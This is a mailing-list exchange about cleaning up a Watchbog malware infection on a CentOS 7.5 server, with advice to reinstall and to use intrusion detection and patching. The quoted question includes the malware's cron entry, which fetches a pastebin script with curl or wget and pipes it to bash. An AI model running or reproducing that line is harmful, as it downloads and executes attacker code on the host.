> Is there a way to find out how the CentOS 7.5 Linux box got infected with > malware? > Currently i am referring to > http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html > to carry out the below steps and is done manually. > > 1)rm -fr /tmp/*timesyncc.service* > 2)crontab -e -u apigee > delete the cron entry > */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- > https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1 > 3)ps aux | grep watchbog > kill -9 pidof watchbog > > Any suggestions or recommendations to find out how CentOS 7.5 Linux box got > infected with Watchbog Malware. Well, if the infected crontab is owned by user 'apigee' then it would suggest that whatever runs as that user is the source of the infection. The malware appears to try to elevate its privs, and if it's successful it modifies various system files. What you are seeing in the 'apigee' crontab is just the tip of the iceberg. It is unlikely that what is in that blog will successfully get rid of all the malware - it will probably stop it running, but your system will still have the malware on it and it may have left other backdoors into your system. The *ONLY* way of being sure your system is clean is to wipe and reinstall. (And make sure that if you restore from backup, that the backup is clean.) > Is there any open source software which can > be installed on CentOS 7.5 Linux box to detect and prevent Malware? > Yes, lots, although most centre around detecting the intrusion rather than preventing it - the classic way of detecting intrusions in the past has been Tripwire, but it's a long time since I used it and there are no doubt better things around. Search for "linux intrusion detection tools". For prevention, by far the best way is to keep your system and application software up to date. The intrusions work by elevating privilege to root, and that elevation requires either a knowledge of passwords/keys or the ability to leverage vulnerabilities. The first is mitigated by strong passwords and proper security housekeeping; the second by regularly updating your system especially with security updates. P.